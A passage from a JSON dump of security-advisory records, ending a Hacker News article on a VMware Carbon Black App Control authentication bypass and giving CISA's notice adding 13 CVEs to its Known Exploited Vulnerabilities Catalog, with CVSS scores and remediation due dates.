[noted](<https://www.vmware.com/security/advisories/VMSA-2021-0013.html>).\n\nVMware credited Zeeshan Shaikh (@bugzzzhunter) from NotSoSecure and Hou JingYi (@hjy79425575) of Qihoo 360 for reporting the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-24T08:00:00", "type": "thn", "title": "Critical Auth Bypass Bug Affects VMware Carbon Black App Control", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21982", "CVE-2021-21998", "CVE-2021-21999"], "modified": "2021-06-24T08:00:41", "id": "THN:868A288940CAEB61BD09AB7B818AD160", "href": "https://thehackernews.com/2021/06/critical-auth-bypass-bug-affects-vmware.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-01-26T11:28:36", "description": "CISA has added 13 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Required Action Due Date** \n---|---|--- \nCVE-2021-32648 | October CMS Improper Authentication | 2/1/2022 \nCVE-2021-21315 | System Information Library for node.js Command Injection Vulnerability | 2/1/2022 \nCVE-2021-21975 | Server Side Request Forgery in vRealize Operations Manager API Vulnerability | 2/1/2022 \nCVE-2021-22991 | BIG-IP Traffic Microkernel Buffer Overflow Vulnerability | 2/1/2022 \nCVE-2021-25296 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25297 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25298 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-33766 | Microsoft Exchange Server Information Disclosure Vulnerability | 2/1/2022 \nCVE-2021-40870 | Aviatrix Controller Unrestricted Upload of File Vulnerability | 2/1/2022 \nCVE-2020-11978 | Apache Airflow Command Injection Vulnerability | 7/18/2022 \nCVE-2020-13671 | Drupal Core Unrestricted Upload of File Vulnerability | 7/18/2022 \nCVE-2020-13927 | Apache Airflow Experimental API Authentication Bypass Vulnerability | 7/18/2022 \nCVE-2020-14864 | Oracle Corporate Business Intelligence Enterprise Edition Path Traversal Vulnerability | 7/18/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >).\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/01/18/cisa-adds-13-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa", "title": "CISA Adds 13 Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978", "CVE-2020-13671", "CVE-2020-13927", "CVE-2020-14864", "CVE-2021-21315", "CVE-2021-21975", "CVE-2021-22991", "CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-32648", "CVE-2021-33766", "CVE-2021-40870"], "modified": "2022-01-25T00:00:00", "id": "CISA:D7385BDD2786721598A2135E182282C2", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/18/cisa-adds-13-known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}